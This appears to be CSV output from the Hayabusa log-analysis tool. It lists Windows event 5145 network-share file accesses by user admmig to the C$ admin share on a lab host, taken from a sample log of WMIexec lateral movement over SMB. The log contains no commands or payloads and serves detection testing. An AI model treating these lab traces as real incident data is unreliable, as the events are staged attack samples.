2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes\3be4139a741b447ab35a2c788a2f4559  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Windows.Serf5111484#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Windows.Serf5111484#\d081d0c6a64c64fa9afe4e545f2eaa05  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\9bbf715cfb5360c95acd27b199083854  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsForm0b574481#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsForm0b574481#\f002202a6660cc8ce07f8ae19d6fac84  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\WsatConfig  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\WsatConfig\30fd20e8b16392d487e0f52dfd8a5900  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\XamlBuildTask  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\XamlBuildTask\72aa615c9ea48820d317a6bed7b07213  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\XsdBuildTask  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\XsdBuildTask\b1861416b236727b9d51d4568d9f6841  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Accessibility  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Accessibility\fabe62e146147faa9fc09e8b9a63d5cc  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\AuditPolicy42d3d2cc#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\AuditPolicy42d3d2cc#\9fe5c370593d72077c6ebc935bdccaf8  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\blbmmc  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\blbmmc\5965cfde76afc1f5c5d70d32fe0c7270  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\blbproxy  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\blbproxy\9efa8cc0254efc497ae439914bbe9207  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\blbwizfx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\blbwizfx\8feba1d1646b72a4bc348315fa7bad6b  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\ComSvcConfig  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\ComSvcConfig\44570ea6e616aa8a35b0768a4336f69d  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.450 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.450 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers\a5132d26ad1468bf7b6b89725e4cefce  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\dfsvc  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\dfsvc\a086b75bb1e8ee361af6ed079a6b77b4  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\EmbeddedLockdown  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\EmbeddedLockdown\870a6acacd5e95c0ffca82696cdb1d38  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\EventViewer  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\EventViewer\dc4701b2db7cf17a8b91db454a97c991  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\ipamapi  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.482 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\ipamapi\dae9598a3b2d70231e340696e284163f  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.497 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A3ec156ec#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.497 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A3ec156ec#\e6ff20c47a7e849012d7ce8bdd777896  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A26c32abb#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A26c32abb#\e58c4e8c63c0494a59885d5502339144  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Abf69f55a#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Abf69f55a#\9f5bb7b6ff9da9d2a0649311aef761e8  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B22c61a69#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B22c61a69#\a9e1bbb2f77ddf73fdc37769da51597e  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B46c55d17#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B46c55d17#\acca0c1913cd50d9cfb935bc3fdcb23d  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B83e9cb53#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B83e9cb53#\84fa86c4d86aa17ce68c75a1625383e0  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B3325a29b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B3325a29b#\11e47175268433f2afe5bf68ea4899ae  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Baa2ca56b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Baa2ca56b#\44884740e6e261405b0440efde616082  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Bfc9dc24d#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Bfc9dc24d#\465ef4c9fe7c77ed5384c3c379fbe9b3  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Build  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Build\a7bcc49edef862e86e95e8959d30ae67  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C8d726d22#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
